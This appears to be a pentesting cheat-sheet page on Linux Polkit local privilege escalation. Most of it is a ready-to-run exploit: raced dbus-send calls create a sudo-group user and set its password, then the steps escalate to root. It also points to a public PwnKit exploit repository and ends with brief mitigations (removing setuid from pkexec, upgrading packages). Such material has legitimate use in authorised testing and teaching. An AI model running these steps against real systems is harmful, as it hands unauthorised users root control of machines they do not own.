PolKit Privilege Escalation
Polkit (PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones.
Create a new user by sending a dbus message.
# string:tester: The new user named "tester".
# string:"Tester Account": The description of the new user.
# int32:1: sudo group
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:tester string:"Tester Account" int32:1 & sleep 0.005s; kill $!
Copied!
Then check the new user ID (uid).
id tester
uid=1000(tester) gid=1000(tester) groups=1000(tester),27(sudo)
Copied!
# -6: SHA512
openssl passwd -6 password123
Copied!
Copy the output hash.
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'<password_hash>' string:'Ask the tester' & sleep 0.005s; kill $!
Copied!
su tester
Copied!
Enter the password you created e.g. “password123”. Now change to root .
sudo -s
# or
sudo su root
Copied!
PwnKit is vulnerability of Polkit to local privilege escalation. There are many exploits available. Below are examples:
https://github.com/Almorabea/pkexec-exploit (this is written by Python)
To avoid the vulnerability, unset setuid from the pkexec executable.
sudo chmod 0755 /usr/bin/pkexec
# or
sudo chmod 0755 `which pkexec`
Copied!
Or simply upgrade the apt packages in most of distributions which are patched for the vulnerability.
sudo apt update && sudo apt upgrade
Copied!
References
Last updated